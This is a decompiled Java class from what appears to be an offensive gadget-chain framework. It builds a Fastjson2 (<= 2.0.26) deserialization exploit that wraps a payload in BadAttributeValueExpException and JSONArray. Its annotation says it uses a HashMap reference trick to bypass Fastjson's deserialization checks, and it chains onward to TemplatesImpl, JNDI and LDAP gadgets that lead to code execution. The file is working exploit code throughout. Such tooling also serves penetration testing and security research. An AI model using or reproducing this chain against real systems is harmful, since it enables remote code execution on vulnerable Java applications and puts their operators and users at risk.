package com.ar3h.chains.gadget.impl.javanative.fastjson;

import com.alibaba.fastjson2.JSONArray;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.util.Reflections;
import java.util.HashMap;
import javax.management.BadAttributeValueExpException;
import org.apache.logging.log4j.core.jackson.JsonConstants;

@GadgetAnnotation(name = "Fastjson2反序列化链", description = "BadAttributeValueExpException.readObject() => JSONArray.toString() => getter，这里使用了Hashmap的引用机制绕过Fastjson反序列化的检测", dependencies = {"com.alibaba:fastjson <= 2.0.26"}, priority = 15)
@GadgetTags(tags = {Tag.JavaNativeDeserialize}, nextTags = {Tag.TemplatesImplChain, Tag.LdapAttributeChain, Tag.SignedObjectChain, Tag.MapMessageChain, Tag.C3p0JndiChain, Tag.DataSourceChains, Tag.DataSourceWrapperChain, "hutoolJndiDSFactory", "hutoolPooledDSFactory", "hutoolSimpleDSFactory"}, excludes = {Tag.NotForFastjson})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/fastjson/Fastjson2.class */
public class Fastjson2 implements Gadget {
    public HashMap getObject(Object obj) throws Exception {
        JSONArray jSONArray = new JSONArray();
        jSONArray.add(obj);
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
        Reflections.setFieldValue(badAttributeValueExpException, "val", jSONArray);
        Reflections.setFieldValue(badAttributeValueExpException, "stackTrace", new StackTraceElement[0]);
        Reflections.setFieldValue(badAttributeValueExpException, "suppressedExceptions", null);
        Reflections.setFieldValue(badAttributeValueExpException, JsonConstants.ELT_CAUSE, null);
        HashMap hashMap = new HashMap();
        hashMap.put(obj, badAttributeValueExpException);
        return hashMap;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object doCreate = gadgetChain.doCreate(gadgetContext);
        gadgetContext.put(ContextTag.FASTJSON_HANDLE_BYPASS_KEY, doCreate);
        return getObject(doCreate);
    }
}
